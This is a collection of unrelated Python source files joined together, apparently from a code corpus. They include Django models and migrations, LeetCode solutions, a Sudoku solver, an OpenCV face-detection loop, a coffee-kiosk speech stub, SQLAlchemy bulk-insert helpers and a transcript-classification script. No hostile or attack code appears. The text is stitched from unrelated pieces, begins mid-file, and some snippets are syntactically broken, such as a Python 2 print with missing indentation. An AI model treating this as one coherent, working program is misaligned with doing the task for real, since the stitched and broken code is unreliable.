    i = 0  # shared, unsynchronized counter used by the worker threads
    for _ in range(args.threads):
        t = threading.Thread(target=main)
        threads.append(t)
    for thread in threads:
        thread.start()
|
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Contains functions to create default values for parameters.
"""
from neon.params.val_init import GaussianValGen
from neon.metrics.misclass import MisclassPercentage
def default_weight_init():
    """Return the default weight initializer: Gaussian(mean 0.0, scale 0.01)."""
    return GaussianValGen(scale=0.01, loc=0.0)
def default_lrule_init():
    """Return the default learning rule: gradient descent with constant
    momentum 0.9 and learning rate 0.1."""
    return {
        'type': 'gradient_descent_momentum',
        'lr_params': {
            'learning_rate': 0.1,
            'momentum_params': {'type': 'constant', 'coef': 0.9},
        },
    }
def default_metric():
    """Return the default metrics: misclassification percentage for both
    the train and test splits."""
    return {
        'train': [MisclassPercentage()],
        'test': [MisclassPercentage()],
    }
|
# coding:utf-8
__author__ = 'Baxter'
def insert():
    """Insert a record (not implemented yet)."""
    pass
def update():
    """Update a record (not implemented yet)."""
    pass
def delete():
    """Delete a record (not implemented yet)."""
    pass


# Backward-compatible alias: the function was originally published under
# the misspelled name `delte`; existing callers keep working.
delte = delete
def select():
    """Query records (not implemented yet)."""
    pass
# Generated by Django 2.1.7 on 2019-03-30 12:01
from django.db import migrations, models
# Auto-generated Django migration: loosens PartnerModel fields to allow
# blank/null values. Normally not edited by hand.
class Migration(migrations.Migration):

    dependencies = [
        ('core', '0004_auto_20190330_1402'),
    ]

    operations = [
        migrations.AlterField(
            model_name='partnermodel',
            name='description',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Краткое описание'),
        ),
        migrations.AlterField(
            model_name='partnermodel',
            name='email',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Email'),
        ),
        migrations.AlterField(
            model_name='partnermodel',
            name='image',
            field=models.ImageField(blank=True, null=True, upload_to='', verbose_name='Картинка'),
        ),
        migrations.AlterField(
            model_name='partnermodel',
            name='inn',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='ИНН'),
        ),
        migrations.AlterField(
            model_name='partnermodel',
            name='phone',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Телефон'),
        ),
        migrations.AlterField(
            model_name='partnermodel',
            name='site',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Веб-сайт'),
        ),
    ]
|
class Solution(object):
    def removeDuplicates(self, nums):
        """
        Remove consecutive duplicates from *nums* in place and return the
        number of unique elements kept; *nums* ends truncated to exactly
        those elements.

        :type nums: List[int]
        :rtype: int

        Fixes versus the original: an empty list now returns 0 (it
        returned ``None``, but callers expect an int count), and the
        O(n^2) ``pop``-in-a-loop is replaced by a two-pointer sweep.
        """
        if not nums:
            return 0
        write = 1  # next slot for a newly-seen unique value
        for read in range(1, len(nums)):
            if nums[read] != nums[write - 1]:
                nums[write] = nums[read]
                write += 1
        del nums[write:]  # preserve visible behaviour: nums fully deduped
        return write
|
# coding = utf-8
from selenium import webdriver |
class Solution:
    def simplifyPath(self, path: str) -> str:
        """Collapse '.', '..' and empty segments of a Unix-style path.

        Splits on '/', skips the first segment (empty for absolute
        paths), resolves '..' against a stack of kept segments, and
        rejoins with a leading '/'.
        """
        kept = []
        for piece in path.split("/")[1:]:
            if piece == "..":
                if kept:
                    kept.pop()
            elif piece not in ("", "."):
                kept.append(piece)
        return "/" + "/".join(kept)
|
class Read:
    """
    An accessor to read a global resource
    """
    def __init__(self, class_name):
        # The resource type this accessor grants read access to.
        self.class_name = class_name
class Write:
    """
    An accessor to read/write a global resource
    """
    def __init__(self, class_name):
        # The resource type this accessor grants read/write access to.
        self.class_name = class_name
class Entities:
    """
    An accessor to read all entities in the world
    """
    def __init__(self):
        pass

    def filter(self, *args):
        """Returns a list of component values with a certain value.

        (Not implemented yet.)
        """
        # Fix: this text previously floated as a bare string expression in
        # the class body instead of being attached to `filter` as its
        # docstring.
        pass
class System:
    """
    A system is a class which modifies a certain set of components each tick of the application
    """
    @staticmethod
    def data():
        # Declares the components/resources this system needs each tick
        # (not implemented yet).
        pass
    def run(self, data):
        # Executes one tick over the values requested by data()
        # (not implemented yet).
        pass
|
N = 9  # board dimension: a 9x9 grid of 3x3 boxes


# Backtracking driver: find the next empty cell, try each candidate digit,
# recurse, and undo the placement when the recursion fails.
# Returns True once the board is completely (and validly) filled.
def solve(board):
    empty_cell = is_empty(board)
    if not empty_cell:
        return True  # no zeros left: the board is solved
    row, col = empty_cell
    for candidate in range(1, 10):
        if not is_valid(candidate, row, col, board):
            continue
        board[row][col] = candidate
        if solve(board):
            return True
        board[row][col] = 0  # backtrack
    return False


# Locate the first cell still holding 0, scanning row-major.
# Returns (row, col), or None implicitly when the board is full.
def is_empty(board):
    for r in range(len(board)):
        for c in range(len(board[0])):
            if board[r][c] == 0:
                return (r, c)


# True when placing `marker` at (row, col) breaks no Sudoku rule:
# the digit must not already appear in that row, column, or 3x3 box.
def is_valid(marker, row, col, board):
    if any(board[row][i] == marker and i != col for i in range(N)):
        return False
    if any(board[j][col] == marker and j != row for j in range(N)):
        return False
    # Top-left corner of the enclosing 3x3 box.
    box_row = (row // 3) * 3
    box_col = (col // 3) * 3
    for r in range(box_row, box_row + 3):
        for c in range(box_col, box_col + 3):
            if board[r][c] == marker:
                return False
    return True
# Print the current board, one row per line, values space-separated
# (keeps the original's trailing space after the last value).
def printing(arr):
    for r in range(N):
        row_text = " ".join(str(arr[r][c]) for c in range(N))
        print(row_text + " ")
# Entry point used by main to solve a board.
# NOTE: the name shadows the builtin input(); kept because callers use it.
# The `x` parameter is unused but preserved for interface compatibility.
# Returns (board, 0) on success, (board, 1) when no solution exists.
def input(board, x):
    printing(board)
    solved = solve(board)
    print("-----------------")
    if solved:
        printing(board)
        print("Solved")
        return board, 0
    print("No Solution")
    return board, 1
|
# Celebrity problem: a celebrity knows nobody but is known by everybody.
# Relies on a global knows(a, b) oracle defined elsewhere (Python 2: xrange).
def findCelebrity(self, n):
    # Candidate elimination: if x knows i, x cannot be the celebrity,
    # so i becomes the new candidate.  One pass leaves the only possible
    # celebrity in x.
    x = 0
    for i in xrange(n):
        if knows(x, i): x = i
    # Verify: x must not know anyone with index < x (indices > x were
    # already ruled out during the elimination pass) ...
    if any(knows(x, i) for i in xrange(x)):
        return -1
    # ... and everyone must know x.
    if any(not knows(i, x) for i in xrange(n)):
        return -1
    return x
from django.db import models
from datetime import datetime
# Create your models here.
class Realtor(models.Model):
    """A realtor profile: contact details, MVP flag, and hire date."""
    name = models.CharField(max_length=200)
    # Uploaded photos are bucketed by date: photos/YYYY/MM/DD.
    photo = models.ImageField(upload_to='photos/%Y/%m/%d')
    description = models.TextField(blank=True) # by putting blank True we will not get error if we do not fill it
    phone = models.CharField(max_length= 20)
    # NOTE(review): plain CharField; EmailField would add validation, but
    # changing the field type requires a migration -- left as-is here.
    email = models.CharField(max_length= 50)
    is_mvp = models.BooleanField(default=False)
    # NOTE(review): datetime.now is timezone-naive; if USE_TZ=True Django
    # expects django.utils.timezone.now -- confirm project settings.
    hire_date = models.DateTimeField(default=datetime.now , blank= True)
    def __str__(self):
        return self.name
import cv2
from threading import Thread
# 多线程,高效读视频
class WebcamVideoStream:
    """Read frames from a video source on a background thread.

    The reader loop keeps ``self.frame`` refreshed so ``read()`` never
    blocks on the capture device.
    """

    def __init__(self, src, width, height):
        # Open the capture and request the desired frame size.
        self.stream = cv2.VideoCapture(src)
        self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
        self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
        # Prime the first frame so read() works before the thread starts.
        (self.grabbed, self.frame) = self.stream.read()
        # Flag polled by the reader loop; set by stop().
        self.stopped = False

    def start(self):
        """Launch the background reader thread; returns self (fluent)."""
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """Reader loop: keep grabbing frames until stop() is called."""
        while not self.stopped:
            (self.grabbed, self.frame) = self.stream.read()

    def read(self):
        """Return the most recently grabbed frame."""
        return self.frame

    def stop(self):
        """Ask the reader loop to exit."""
        self.stopped = True
# Usage example: capture via the threaded reader and run face detection.
cap = WebcamVideoStream(src="d:/xxx.mp4", width=640, height=480).start()
cascade_path = "d:\XML\cuda\haarcascade_frontalface_alt2.xml"
# Fix: build the classifier ONCE.  The original re-loaded the cascade XML
# from disk on every frame inside the loop, which is pure overhead.
cascade = cv2.CascadeClassifier(cascade_path)
while True:
    frame = cap.read()
    frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    facerect = cascade.detectMultiScale(frame_gray, scaleFactor=1.3, minNeighbors=5, minSize=(10,10))
    # Draw a box and label on every detected face.
    for (x, y, w, h) in facerect:
        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 127), 5)
        font = cv2.FONT_HERSHEY_TRIPLEX
        cv2.putText(frame, "Searching .....", (10, 100), font, 1, (255, 255, 0), 1, False)
    imSize = cv2.resize(frame, (800, 640))
    cv2.imshow('Opencv', imSize)
    k = cv2.waitKey(500)
    if k == 27:  # ESC quits
        break
cap.stop()
cv2.destroyAllWindows()
from webdev import get_posts
from save import save_to_csv
# Fetch the scraped posts and persist them to CSV.
posts = get_posts()
save_to_csv(posts)
from .models import Reply, Thread
from django import forms
class CommentForm(forms.ModelForm):
    """
    Form to add comment to thread
    """
    class Meta:
        model = Reply
        fields = ['body']

    def __init__(self, *args, **kwargs):
        """
        Labels removed from body field on comment form
        [Code taken from 'https://stackoverflow.com/questions/
        11472495/remove-labels-in-a-django-crispy-forms']
        Reduced height of body field on comment form
        [Code taken from 'https://stackoverflow.com/questions/
        38684753/django-reducing-the-size-of-input-box-in-crispy-forms']
        """
        # Zero-argument super() (Python 3 idiom), matching the style used by
        # ThreadForm in this module.
        super().__init__(*args, **kwargs)
        self.fields['body'].label = ''
        self.fields['body'].widget.attrs.update(style='height: 4.5em')
class ThreadForm(forms.ModelForm):
    """
    Form to add thread to forum
    """
    class Meta:
        model = Thread
        fields = ['topic', 'description']

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Apply the shared widget styling to every field on the form.
        for field in self.fields.values():
            field.widget.attrs['class'] = 'border-black rounded-0'
|
from rest_framework import serializers
from .models import Reclamacoes,Categoria
class reclamacoesSerializer(serializers.ModelSerializer):
    """Serialize every field of the Reclamacoes model."""

    class Meta:
        model = Reclamacoes
        # Plain string: the parentheses in the original were redundant.
        fields = '__all__'
class categoriaSerializer(serializers.ModelSerializer):
    """Serialize every field of the Categoria model."""

    class Meta:
        model = Categoria
        # Plain string: the parentheses in the original were redundant.
        fields = '__all__'
|
#!/usr/bin/env python
# Funtion:
# Filename:
class Dog(object):
    """Property-protocol demo: ``eat`` wraps the private ``__food`` attribute."""

    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.__food = 'fish'  # name-mangled to _Dog__food

    def _get_food(self):
        # Final getter: just expose the private attribute.  (In the original,
        # the last @eat.getter replaced the initial printing getter, so only
        # this behaviour survived.)
        return self.__food

    def _set_food(self, food):
        print('set to food:', food)
        self.__food = food

    def _del_food(self):
        del self.__food
        print('food 变量删除完毕')

    # Equivalent to the original's stacked @property/@eat.setter/
    # @eat.deleter/@eat.getter decorators.
    eat = property(_get_food, _set_food, _del_food)
# Demo driving the Dog property.  Fix: the stray bare `property` expression
# that sat here was a no-op statement (leftover typo) and has been removed.
d1 = Dog('bagong', 1)
d1.eat            # getter: value computed and discarded
d1.eat = 'water'  # setter: prints and stores
d1.eat            # getter again (discarded)
print(d1.eat)
del d1.eat        # deleter: removes the private attribute and prints
print('111')
class C(object):
    """Classic property() example: ``x`` delegates to the private ``_x``."""

    def __init__(self):
        self._x = '123'

    def getx(self):
        return self._x

    def setx(self, value):
        self._x = value

    def delx(self):
        del self._x

    # Bundle the three accessors into a managed attribute.
    x = property(getx, setx, delx, "I'm the 'x' property.")
c = C()
# Fix: the original did `c.setx = '222'`, which never called the setter --
# it shadowed the bound method with a string, so the final print still
# showed '123'.  Call the setter instead.
c.setx('222')
a = c.getx
print(a())
|
#!/usr/bin/env python
__author__ = "Blaze Sanders"
__email__ = "blaze@robobev.com"
__company__ = "Robotic Beverage Technologies Inc"
__status__ = "Development"
__date__ = "Late Updated: 2018-04-02"
__doc__ = "Play predefine text using EMIC2 hardware or AWS Polly interface"
# Useful system jazz
import sys, time, traceback, argparse
# Allow control of all keyboard keys
import pynput.keyboard
from pynput.keyboard import Key, Controller
# Identifiers for the pre-recorded .mp3 audio clips played by the kiosk.
HELLO_AUDIO = 1 #"Hello, Is this your first time with us?"
PLACE_AUDIO = 2 #TO-DO:
GOOD_AUDIO = 3 #TO-DO:
COFFEE_AUDIO = 4 #TO-DO:
READY_AUDIO = 5 #TO-DO:
NUMBER_AUDIO = 6 #TO-DO:
NOT_REGISTERED_AUDIO = 7 #TO-DO:
DOWNLOAD_AUDIO = 8 #TO-DO: DELETE?
DEBUG_STATEMENTS_ON = True #Toggle debug statements on and off for this python file
## TO-DO: share this clip->message table with awsPollyInterface to remove
## the copy/paste duplication between the two speech backends.
# @brief Plays predefined text stored on Pi
#
# @param audioClipNum Audio clip to play from speaker
#
# @return NOTHING
def emic2Interface(audioClipNum):
    # Every branch of the original was gated on the debug flag (including
    # the COFFEE countdown), so bail out early when it is off.
    if not DEBUG_STATEMENTS_ON:
        return
    if audioClipNum == COFFEE_AUDIO:
        # Special case: also types a 10..1 countdown via the virtual keyboard.
        keyboard = Controller()
        print("Large caffe mocha with milk coming up \n\n")
        for timer in range(10):
            keyboard.type(str(abs(10-timer)))
            keyboard.type("...")
            time.sleep(1)
        return
    # Simple clips: one or more lines printed to the console.
    # (The actual EMIC2.Say() call is still stubbed out, as before.)
    messages = {
        HELLO_AUDIO: ["Hello, Is this your first time using a BARISTO kiosk? \n\n"],
        PLACE_AUDIO: ["Place your smart cup on the black pad.",
                      "OR",
                      "Tell me the last four digits of your phone number. \n\n"],
        GOOD_AUDIO: ["Good morning, Rosie. \n\n"],
        READY_AUDIO: ["Your coffee is ready, Have a great day! \n\n"],
        NUMBER_AUDIO: ["You said your number was 555-555-5555 correct? \n\n"],
        NOT_REGISTERED_AUDIO: ["Your phone number is not registered with BARISTO. \n",
                               "Please scan the QR code below to download BARISTO from the Google Play store and register with us. \n\n"],
    }
    # Unknown clip numbers print nothing, matching the original if-chain.
    for line in messages.get(audioClipNum, []):
        print(line)
## TO-DO: share the clip->message handling with emic2Interface to remove
## the copy/paste duplication between the two speech backends.
# @brief Calls into AWS Polly API
#
# @param audioClipNum Audio clip to play from speaker
#
# @return NOTHING
def awsPollyInterface(audioClipNum):
    # All output is debug-only; exit early when the flag is off.
    if not DEBUG_STATEMENTS_ON:
        return
    if audioClipNum == HELLO_AUDIO:
        print("Hello, Is this your first time with us?")
        #AWS.Polly("Hello, Is this your first time with us?")
    elif audioClipNum == PLACE_AUDIO:
        print("Place your smart cup on the black pad.")
        print("OR")
        # Fix: "ohone" -> "phone" in the user-facing prompt.
        print("Tell me the last four digits of your phone number.")
    elif audioClipNum == GOOD_AUDIO:
        print("Good morning, Rosie.")
    elif audioClipNum == COFFEE_AUDIO:
        # Types a 10..1 countdown via the virtual keyboard.
        keyboard = Controller()
        print("Large caffe mocha with sugar coming up")
        for timer in range(10):
            keyboard.type(str(abs(10-timer)))
            keyboard.type("...")
            time.sleep(1)
    elif audioClipNum == READY_AUDIO:
        print("Your coffee is ready, Have a great day!")
    elif audioClipNum == NUMBER_AUDIO:
        print("You said your number was 555-555-5555 correct?")
    elif audioClipNum == NOT_REGISTERED_AUDIO:
        print("Your phone number is not registered with BARISTO.")
        print("Please scan the QR code below to download BARISTO from the Google Play store and register with us.")
|
import os
hapus = os.remove("wew.txt")
if True:
print "file dihapus"
|
"""SQLAlchemy core utility functionality
Functionality for faster bulk inserts without using the ORM.
More info: https://docs.sqlalchemy.org/en/latest/faq/performance.html
"""
import logging
import json
import scipy
import numpy as np
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.sql import select
from sqlalchemy.orm import scoped_session, sessionmaker
from tqdm import tqdm
from ticclat.ticclat_schema import Wordform, Corpus, Document, \
TextAttestation, Anahash, corpusId_x_documentId
from ticclat.utils import chunk_df, write_json_lines, read_json_lines, \
get_temp_file, iterate_wf, chunk_json_lines, count_lines
# Module-level logger for progress/diagnostic messages.
LOGGER = logging.getLogger(__name__)
# Thread-local session registry; bound to an engine by get_engine().
DB_SESSION = scoped_session(sessionmaker())
def get_engine(user, password, dbname,
               dburl='mysql://{}:{}@localhost/{}?charset=utf8mb4'):
    """Returns an engine that can be used for fast bulk inserts

    Inputs:
        user: database user name
        password: database password
        dbname: database name, substituted into `dburl`
        dburl: connection-string template filled with user/password/dbname

    Side effect: rebinds the module-level DB_SESSION registry to the new
    engine, with autoflush and expire_on_commit disabled for bulk speed.
    """
    engine = create_engine(dburl.format(user, password, dbname), echo=False)
    DB_SESSION.remove()
    DB_SESSION.configure(bind=engine, autoflush=False, expire_on_commit=False)
    return engine
def sql_insert(engine, table_object, to_insert):
    """Insert a list of objects into the database without using a session.

    This is a fast way of (mass) inserting objects. However, because no session
    is used, no relationships can be added automatically. So, use with care!

    This function is a simplified version of test_sqlalchemy_core from here:
    https://docs.sqlalchemy.org/en/13/faq/performance.html#i-m-inserting-400-000-rows-with-the-orm-and-it-s-really-slow

    Inputs:
        engine: SQLAlchemy engine or session
        table_object: object representing a table in the database (i.e., one
            of the objects from ticclat_schema); must expose `__table__`
        to_insert (list of dicts): list containg dictionary representations of
            the objects (rows) to be inserted
    """
    # Executemany-style core insert: one statement, many parameter sets.
    engine.execute(table_object.__table__.insert(), to_insert)
def sql_query_batches(engine, query, iterator, total=0, batch_size=10000):
    """
    Execute `query` on items in `iterator` in batches.

    Take care: no session is used, so relationships can't be added automatically.

    Inputs:
        total: used for tqdm, since iterator will often be a generator, which
            has no predefined length.
    """
    with tqdm(total=total, mininterval=2.0) as progress:
        pending = []
        for item in iterator:
            pending.append(item)
            if len(pending) == batch_size:
                engine.execute(query, pending)
                pending = []
                progress.update(batch_size)
        # Executing with an empty parameter list would insert a row of
        # defaults (or fail if fields have none), so only flush the
        # remainder when something is actually left over.
        if pending:
            engine.execute(query, pending)
            progress.update(len(pending))
def sql_insert_batches(engine, table_object, iterator, total=0, batch_size=10000):
    """
    Insert items in `iterator` in batches into database table.

    Take care: no session is used, so relationships can't be added automatically.

    Inputs:
        table_object: the ticclat_schema object corresponding to the database
            table.
        total: used for tqdm, since iterator will often be a generator, which
            has no predefined length.
    """
    with tqdm(total=total, mininterval=2.0) as progress:
        pending = []
        for item in iterator:
            pending.append(item)
            if len(pending) == batch_size:
                sql_insert(engine, table_object, pending)
                pending = []
                progress.update(batch_size)
        # Inserting an empty list would add a row of column defaults (or
        # error out), so only flush a non-empty remainder.
        if pending:
            sql_insert(engine, table_object, pending)
            progress.update(len(pending))
def bulk_add_wordforms_core(engine, iterator, **kwargs):
    """
    Insert wordforms in `iterator` in batches into wordforms database table.

    Convenience wrapper around `sql_insert_batches` for wordforms.
    `kwargs` (e.g. `total`, `batch_size`) are forwarded unchanged.

    Take care: no session is used, so relationships can't be added automatically.
    """
    sql_insert_batches(engine, Wordform, iterator, **kwargs)
def bulk_add_textattestations_core(engine, iterator, **kwargs):
    """
    Insert text attestations in `iterator` in batches into text_attestations database table.

    Convenience wrapper around `sql_insert_batches` for text attestations.
    `kwargs` (e.g. `total`, `batch_size`) are forwarded unchanged.

    Take care: no session is used, so relationships can't be added automatically.
    """
    sql_insert_batches(engine, TextAttestation, iterator, **kwargs)
def bulk_add_anahashes_core(engine, iterator, **kwargs):
    """
    Insert anahashes in `iterator` in batches into anahashes database table.

    Convenience wrapper around `sql_insert_batches` for anagram hashes.
    `kwargs` (e.g. `total`, `batch_size`) are forwarded unchanged.

    Take care: no session is used, so relationships can't be added automatically.
    """
    sql_insert_batches(engine, Anahash, iterator, **kwargs)
def get_tas(corpus, doc_ids, wf_mapping, word_from_tdmatrix_id):
    """
    Yield term attestations from a wordform frequency matrix.

    Term attestation records the occurrence and frequency of a word in a given
    document.

    Inputs:
        corpus: the dense corpus term-document matrix, like from
            `tokenize.terms_documents_matrix_ticcl_frequency`
        doc_ids: list of indices of documents in the term-document matrix
        wf_mapping: dictionary mapping wordforms (key) to database wordform_id
        word_from_tdmatrix_id: mapping of term-document matrix column index
            (key) to wordforms (value)
    """
    # COO form exposes the nonzero entries as parallel (row, col, value)
    # arrays, so only attested (doc, word) pairs are visited.
    sparse = scipy.sparse.coo_matrix(corpus)
    for doc_ix, word_ix, frequency in zip(sparse.row, sparse.col, sparse.data):
        wordform = word_from_tdmatrix_id[word_ix]
        yield {'wordform_id': wf_mapping[wordform],
               'document_id': doc_ids[doc_ix],
               'frequency': int(frequency)}
def add_corpus_core(session, corpus_matrix, vectorizer, corpus_name,
                    document_metadata=pd.DataFrame(), batch_size=50000):
    """
    Add a corpus to the database.

    A corpus is a collection of documents, which is a collection of words.
    This function adds all words as wordforms to the database, records their
    "attestation" (the fact that they occur in a certain document and with what
    frequency), adds the documents they belong to, adds the corpus and adds the
    corpus ID to the documents.

    Inputs:
        session: SQLAlchemy session (e.g. from `dbutils.get_session`)
        corpus_matrix: the dense corpus term-document matrix, like from
            `tokenize.terms_documents_matrix_ticcl_frequency`
        vectorizer: the terms in the term-document matrix, as given by
            `tokenize.terms_documents_matrix_ticcl_frequency`
        corpus_name: the name of the corpus in the database
        document_metadata: see `ticclat_schema.Document` for all the possible
            metadata. Make sure the index of this dataframe
            matches with the document identifiers in the term-
            document matrix, which can be easily achieved by
            resetting the index for a Pandas dataframe.
        batch_size: batch handling of wordforms to avoid memory issues.

    NOTE(review): the wordform vocabulary is spooled through temp files
    (via write_json_lines/read_json_lines) to bound memory use; the temp
    files presumably live for the duration of the `with` blocks -- confirm
    in `utils.get_temp_file`.
    """
    with get_temp_file() as wf_file:
        # Spool the vocabulary to disk so huge corpora don't blow up memory.
        write_json_lines(wf_file, iterate_wf(vectorizer.vocabulary_))
        # Prepare the documents to be added to the database
        LOGGER.info('Creating document data')
        corpus_csr = scipy.sparse.csr_matrix(corpus_matrix)
        word_counts = corpus_csr.sum(axis=1)  # sum the rows
        wc_list = np.array(word_counts).flatten().tolist()
        document_metadata['word_count'] = wc_list
        # Determine which wordforms in the vocabulary need to be added to the
        # database
        LOGGER.info('Determine which wordforms need to be added')
        with get_temp_file() as wf_to_add_file:
            with tqdm(total=count_lines(wf_file)) as pbar:
                for chunk in chunk_json_lines(wf_file, batch_size=batch_size):
                    # Find out which wordwordforms are not yet in the database
                    wordforms = {wf['wordform'] for wf in chunk}
                    select_statement = select([Wordform]).where(Wordform.wordform.in_(wordforms))
                    result = session.execute(select_statement).fetchall()
                    # wf: (id, wordform, anahash_id, wordform_lowercase)
                    existing_wfs = {wf[1] for wf in result}
                    # Only wordforms not already present are queued for insert.
                    for wordform in wordforms.difference(existing_wfs):
                        wf_to_add_file.write(json.dumps({'wordform': wordform,
                                                         'wordform_lowercase': wordform.lower()}))
                        wf_to_add_file.write('\n')
                    pbar.update(batch_size)
            # Create the corpus (in a session) and get the ID
            LOGGER.info('Creating the corpus')
            corpus = Corpus(name=corpus_name)
            session.add(corpus)
            # add the documents using ORM, because we need to link them to the
            # corpus
            LOGGER.info('Adding the documents')
            for doc in document_metadata.to_dict(orient='records'):
                document_obj = Document(**doc)
                document_obj.document_corpora.append(corpus)
            # flush so corpus_id is populated by the database
            session.flush()
            corpus_id = corpus.corpus_id
            # Insert the wordforms that need to be added using SQLAlchemy core (much
            # faster than using the ORM)
            LOGGER.info('Adding the wordforms')
            bulk_add_wordforms_core(session, read_json_lines(wf_to_add_file))
        LOGGER.info('Prepare adding the text attestations')
        # make a mapping from
        df = pd.DataFrame.from_dict(vectorizer.vocabulary_, orient='index')
        df = df.reset_index()
        LOGGER.info('\tGetting the wordform ids')
        wf_mapping = {}
        for chunk in chunk_df(df, batch_size=batch_size):
            to_select = list(chunk['index'])
            select_statement = select([Wordform]).where(Wordform.wordform.in_(to_select))
            result = session.execute(select_statement).fetchall()
            for wordform in result:
                # wordform: (id, wordform, anahash_id, wordform_lowercase)
                wf_mapping[wordform[1]] = wordform[0]
        LOGGER.info('\tGetting the document ids')
        # get doc_ids
        select_statement = select([corpusId_x_documentId.join(Corpus).join(Document)]) \
            .where(Corpus.corpus_id == corpus_id).order_by(Document.document_id)
        result = session.execute(select_statement).fetchall()
        # row: (corpus_id, document_id, ...)
        doc_ids = [row[1] for row in result]
        LOGGER.info('\tReversing the mapping')
        # reverse mapping from wordform to id in the terms/document matrix
        word_from_tdmatrix_id = dict(zip(vectorizer.vocabulary_.values(),
                                         vectorizer.vocabulary_.keys()))
        LOGGER.info('\tGetting the text attestations')
        with get_temp_file() as ta_file:
            write_json_lines(ta_file, get_tas(corpus_matrix, doc_ids, wf_mapping, word_from_tdmatrix_id))
            LOGGER.info('Adding the text attestations')
            total = count_lines(ta_file)
            bulk_add_textattestations_core(session, read_json_lines(ta_file),
                                           total=total, batch_size=batch_size)
|
import numpy as np
import pandas as pd
import math
import os
import sklearn
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import KFold
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import svm
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression
import io
from pdfminer.converter import TextConverter
from pdfminer.pdfinterp import PDFPageInterpreter
from pdfminer.pdfinterp import PDFResourceManager
from pdfminer.pdfpage import PDFPage
import matplotlib.pyplot as plt
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
# Get the filenames/paths of the transcripts we'll be reading:
# one sub-folder per ticker under ./transcripts/.
filenames = []
filepaths = []
directory = os.fsencode('./transcripts/')
for ticker_entry in os.listdir(directory):
    ticker = os.fsdecode(ticker_entry)
    if ticker == '.DS_Store':
        continue  # macOS metadata, not a ticker folder
    for transcript_entry in os.listdir(os.fsencode('./transcripts/' + ticker)):
        filename = os.fsdecode(transcript_entry)
        filepaths.append('./transcripts/' + ticker + '/' + filename)
        filenames.append(filename)
filepaths  # notebook-style echo; a no-op when run as a script
def extract_text_from_pdf(pdf_path):
    """Extract all text from the PDF at `pdf_path` using pdfminer.

    Returns the text as a single string, or None when the document yields
    no text (matching the original's implicit-None behaviour).
    """
    resource_manager = PDFResourceManager()
    fake_file_handle = io.StringIO()
    converter = TextConverter(resource_manager, fake_file_handle)
    page_interpreter = PDFPageInterpreter(resource_manager, converter)
    try:
        with open(pdf_path, 'rb') as fh:
            for page in PDFPage.get_pages(fh,
                                          caching=True,
                                          check_extractable=True):
                page_interpreter.process_page(page)
        text = fake_file_handle.getvalue()
    finally:
        # Fix: the original only closed these on the success path, leaking
        # the converter/StringIO when a page failed to process.
        converter.close()
        fake_file_handle.close()
    if text:
        return text
def extract_from_folder(filepaths):
    """Extract text from every PDF path, printing simple progress counts."""
    print(len(filepaths))
    documents = []
    # Progress counter: print 1, 2, 3, ... after each extraction.
    for count, path in enumerate(filepaths, start=1):
        documents.append(extract_text_from_pdf(path))
        print(count)
    return documents
# Fix: `content` was referenced but never assigned -- the extraction step
# was missing, so this line raised NameError at runtime.
content = extract_from_folder(filepaths)
df = pd.DataFrame({'filename': filenames, 'content': content})
df  # notebook-style echo
# Get the price data files. These files contain the over/under reaction
# labels that we are using to train.
price_filenames = []
price_filepaths = []
directory = os.fsencode('./prices/')
for fil in os.listdir(directory):
    ticker = os.fsdecode(fil)
    if ticker != '.DS_Store':
        price_filepaths.append('./prices/' + ticker)
        price_filenames.append(ticker)
price_filenames[0].split(' ')[0]  # notebook-style echo of the ticker symbol
# Compile the prices into a single dataframe, joining transcripts to price
# rows on a "YYYYMMDD - TICKER" key.
mergeddf = pd.DataFrame()
for p in range(len(price_filepaths)):
    dfprices = pd.read_csv(price_filepaths[p])
    dfprices['date'] = pd.to_datetime(dfprices['date'])
    dfprices['filename'] = dfprices['date'].apply(lambda x: x.strftime('%Y%m%d') + ' - ' + price_filenames[p].split(' ')[0])
    new_order = [6, 0, 1, 2, 3, 4, 5]
    dfprices = dfprices[dfprices.columns[new_order]]
    # NOTE(review): this strips the extension from df['filename'] on every
    # iteration; it is idempotent, but could be hoisted out of the loop.
    df['filename'] = df['filename'].apply(lambda x: x.split(".")[0])
    # Label: did the *previous* session close above its open?
    dfprices['label'] = (dfprices['close'].shift() - dfprices['open'].shift()) > 0
    merge = df.merge(dfprices, how='inner', on='filename')
    merge['label'] = merge['label'].apply(lambda x: 0 if x == False else 1)
    # Fix: DataFrame.append is deprecated (removed in pandas 2.x);
    # pd.concat is the supported, behaviour-equivalent replacement.
    mergeddf = pd.concat([mergeddf, merge])
def pdf_to_csv(x):
    """Swap a filename's 3-char extension for 'txt' (e.g. 'a.pdf' -> 'a.txt').

    Note: despite the name, the result uses a .txt extension.
    """
    return x[:-3] + 'txt'
# Features: raw transcript text.  Labels: the 0/1 reaction label built above.
X = mergeddf['content'].values
y = np.array(mergeddf['label'].tolist())
# count vectorizer tests
# 5-cross-fold validation tests using multiple classifiers with Term Frequency vectors
# (Here is Multinomial Naive Bayes).
kf = KFold(n_splits=5)
kf.get_n_splits(X)
import warnings
